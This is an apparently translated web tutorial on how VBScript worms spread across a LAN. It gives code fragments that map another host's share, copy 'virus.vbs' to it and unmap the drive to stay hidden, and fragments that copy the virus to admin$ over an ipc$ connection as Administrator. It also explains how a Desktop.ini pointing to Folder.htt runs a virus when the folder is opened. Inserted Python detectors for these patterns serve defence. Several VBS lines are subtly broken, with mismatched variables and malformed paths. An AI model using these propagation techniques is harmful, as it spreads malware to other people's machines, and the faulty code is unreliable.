How script worms spread: using the MapNetworkDrive method in WSH (VBS)

Source: Internet
Author: User
I've seen some discussions on the internet about how script worms spread, and here are some ideas.
1. Using the MapNetworkDrive method in WSH. This method maps a network drive locally.
MapNetworkDrive Method:
object.MapNetworkDrive(strLocalName, strRemoteName, [bUpdateProfile], [strUser], [strPassword])
Parameters
object
WshNetwork object.
strLocalName
A string value representing the local name of the mapped drive.
strRemoteName
A string value representing the UNC name of the share (\\XXX\YYY).
bUpdateProfile
Optional. A Boolean value that indicates whether the mapping information is stored in the current user's profile. If bUpdateProfile is supplied and is true, the mapping is stored in the user profile (the default is false).
strUser
Optional. A string value that represents the user name. If you map a network drive with the credentials of a user other than the current user, you must supply this parameter.
strPassword
Optional. A string value that represents the user's password. If you map a network drive with the credentials of a user other than the current user, you must supply this parameter.
Description
An error occurs when you attempt to map an unshared network drive.
The main principle: after obtaining the local LAN address (typically 192.168.*.*), the worm maps a shared directory on another host to a local drive (such as Z:) and then copies the virus to the mapped drive Z:, which replicates the virus into the other host's directory. Finally, it uses the RemoveNetworkDrive method to remove the mapping so that it is not discovered.
RemoveNetworkDrive Method:
object.RemoveNetworkDrive(strName, [bForce], [bUpdateProfile])
Parameters
object
WshNetwork object.
strName
A string value representing the name of the mapped drive to be removed. The strName parameter can be either a local name or a remote name, depending on how the drive is mapped.
bForce
Optional. A Boolean value that indicates whether to force removal of the mapped drive. If bForce is supplied and is true, the method removes the connection regardless of whether the resource is in use.
bUpdateProfile
Optional. A string value that indicates whether the mapping is removed from the user's profile. If bUpdateProfile is supplied and is true, the mapping is removed from the user profile. The default value for bUpdateProfile is false.
Description
If a mapping exists between a local name (drive letter) and a remote name (UNC name), strName must be set to the local name. If the network path has no local name (drive letter) mapping, strName must be set to the remote name.
Here is example VBS code:
Set myfso= CreateObject ("Scripting.FileSystemObject")
Set WSHNetwork = WScript.CreateObject ("Wscript.Network")
Wshnetwork.mapnetworkdrive "I:", "\" & UNC
Fso.copyfile "C:\virus.vbs", "I:\virus.vbs.txt"
Wshnetwork.removenetworkdrive "I:"
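For triage of script files, the map, copy, unmap sequence described above can be matched statically. The following is an added example, not code from the original page; the function names, the sample scripts and the hosts in them are constructed for illustration.

```python
import re

# VBScript is case-insensitive, so every pattern ignores case.
MAP_RE = re.compile(r'\.MapNetworkDrive\s*\(?\s*"([A-Za-z]):"', re.I)
UNMAP_RE = re.compile(r'\.RemoveNetworkDrive\s*\(?\s*"([A-Za-z]):"', re.I)
# CopyFile/MoveFile whose destination (second argument) is a drive-letter path.
COPY_RE = re.compile(r'\.(?:CopyFile|MoveFile)\s*\(?\s*[^,]+,\s*"([A-Za-z]):\\', re.I)

def strip_comment(line):
    """Cut a trailing ' comment that starts outside a string literal."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line

def find_map_copy_unmap(source):
    """Report drive letters that are mapped, written to and unmapped, in that order."""
    pending = {}    # drive letter -> {"mapped": line number, "copied": line number or None}
    findings = []
    for lineno, raw in enumerate(source.splitlines(), 1):
        line = strip_comment(raw)
        if (m := MAP_RE.search(line)):
            pending[m.group(1).upper()] = {"mapped": lineno, "copied": None}
        elif (m := COPY_RE.search(line)):
            entry = pending.get(m.group(1).upper())
            if entry and entry["copied"] is None:
                entry["copied"] = lineno
        elif (m := UNMAP_RE.search(line)):
            entry = pending.pop(m.group(1).upper(), None)
            if entry and entry["copied"]:
                findings.append({"drive": m.group(1).upper(), **entry, "unmapped": lineno})
    return findings

# Constructed samples: placeholder hosts and file names, no payload.
SUSPECT = r'''Set fso = CreateObject("Scripting.FileSystemObject")
Set net = CreateObject("WScript.Network")
net.MapNetworkDrive "I:", "\\HOST.example\share"
fso.CopyFile "C:\sample.vbs", "I:\sample.vbs.txt"
net.RemoveNetworkDrive "I:"
'''
LOGON = r'''Set net = CreateObject("WScript.Network")
net.MapNetworkDrive "H:", "\\FILESRV.example\home"
' net.RemoveNetworkDrive "H:"   left mapped for the session
'''
```

The check only sees drive letters written as string literals; a script that builds the letter at run time needs behavioural monitoring instead.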
2. Using an ipc$ connection. Readers with a hacking background are probably more familiar with this approach. The principle is to run the commands through WScript.Shell. The many beginner-level ipc$ attack tutorials can be used as a reference; only a code fragment is given here:
Set objshell=wscript.createobject ("Wscript.Shell")
Dim ST,SC
st= "net use \" & "192.168.0.1 \ipc$" & Pass & "/" & "Administrator"
Objshell.run St
sc= "Copy c:\virus.vbs \\192.168.0.1\admin$"
Objshell.run SC
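On the detection side, the pattern above shows up in process-creation logs as children of a script host that first connect to ipc$ and then copy to an administrative share on the same host. The following is an added example, not code from the original page; the record field names (parent_pid, parent_image, cmdline) and all sample values are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# net use \\HOST\ipc$ : group 1 is HOST
IPC_RE = re.compile(r'\bnet1?(?:\.exe)?\s+use\b.*?\\\\([^\\\s"]+)\\ipc\$', re.I)
# copy/xcopy/robocopy ... \\HOST\admin$ or \\HOST\c$ : group 1 is HOST
ADMIN_COPY_RE = re.compile(
    r'\b(?:copy|xcopy|robocopy)\b.*?\\\\([^\\\s"]+)\\(?:admin|[a-z])\$', re.I)

def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def ipc_then_admin_copy(events):
    """Return (parent_pid, host) pairs: a script host's child opened IPC$ on a
    host and a later child of the same script host copied to its admin share."""
    ipc_hosts = defaultdict(set)    # parent pid -> hosts with an IPC$ connection
    hits = []
    for ev in events:               # events are assumed to be in time order
        if image_name(ev["parent_image"]) not in SCRIPT_HOSTS:
            continue
        if (m := IPC_RE.search(ev["cmdline"])):
            ipc_hosts[ev["parent_pid"]].add(m.group(1).lower())
        elif (m := ADMIN_COPY_RE.search(ev["cmdline"])):
            host = m.group(1).lower()
            if host in ipc_hosts[ev["parent_pid"]]:
                hits.append((ev["parent_pid"], host))
    return hits

WSCRIPT = r"C:\Windows\System32\wscript.exe"
# Constructed records (field names are assumptions, hosts are documentation addresses).
EVENTS = [
    {"parent_pid": 4120, "parent_image": WSCRIPT,
     "cmdline": r"net use \\192.0.2.10\ipc$"},
    {"parent_pid": 4120, "parent_image": WSCRIPT,
     "cmdline": r"cmd.exe /c copy C:\Temp\sample.vbs \\192.0.2.10\admin$"},
    {"parent_pid": 988, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"net use \\192.0.2.20\ipc$"},
    {"parent_pid": 5300, "parent_image": WSCRIPT,
     "cmdline": r"cmd.exe /c copy C:\Temp\report.txt \\192.0.2.30\public"},
]
```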
3. Passive spreading through Folder.htt, as the "New Happy Time" virus does.
Desktop.ini: Active Desktop configuration file
Desktop.ini defines how the folder it resides in is displayed on the desktop or in Explorer, along with some properties of the folder.
Key: WebViewTemplate.NT5=file://folder.htt
The idea is to modify Desktop.ini so that it points to the Folder.htt in the same directory; when the folder is opened in Web view, Folder.htt is executed according to the settings in Desktop.ini. A virus written into Folder.htt therefore keeps replicating.
See other virus analyses of New Happy Time for the specifics.
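To audit folders for this mechanism, one can parse each desktop.ini for values that name an .htt template and then inspect the template sitting beside it. The following is an added example, not code from the original page; the function names, the section name in the sample and the choice of script markers are assumptions.

```python
import os
import re

# A value such as file://folder.htt; the optional scheme is stripped from the target.
HTT_VALUE_RE = re.compile(r'^(?:file://)?(?P<target>[^?#]*\.htt)\s*$', re.I)
# Assumption: VBScript blocks and CreateObject calls are what deserves a closer look.
SCRIPT_RE = re.compile(r'<script[^>]*vbscript|createobject\s*\(', re.I)

def template_refs(ini_text):
    """Yield (section, key, target) for each desktop.ini value that names an .htt file."""
    section = ""
    for raw in ini_text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if (m := HTT_VALUE_RE.match(value)):
                yield section, key, m.group("target")

def audit_folder(folder):
    """Return one finding per template reference in <folder>/desktop.ini."""
    ini_path = os.path.join(folder, "desktop.ini")
    if not os.path.isfile(ini_path):
        return []
    with open(ini_path, encoding="utf-8", errors="replace") as fh:
        refs = list(template_refs(fh.read()))
    findings = []
    for section, key, target in refs:
        has_script = None   # None: template missing or outside this folder
        htt_path = os.path.join(folder, target)
        if not re.search(r'[\\/]', target) and os.path.isfile(htt_path):
            with open(htt_path, encoding="utf-8", errors="replace") as fh:
                has_script = bool(SCRIPT_RE.search(fh.read()))
        findings.append({"section": section, "key": key, "target": target,
                         "template_has_script": has_script})
    return findings

# Constructed samples; the section name is a placeholder and the template has no payload.
SAMPLE_INI = "[ExampleSection]\nWebViewTemplate.NT5=file://folder.htt\n"
SAMPLE_HTT = '<html><script language="VBScript">\' placeholder\n</script></html>'
```

A finding with template_has_script set to True is a triage signal; compare the template against a known-good copy before drawing a conclusion.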
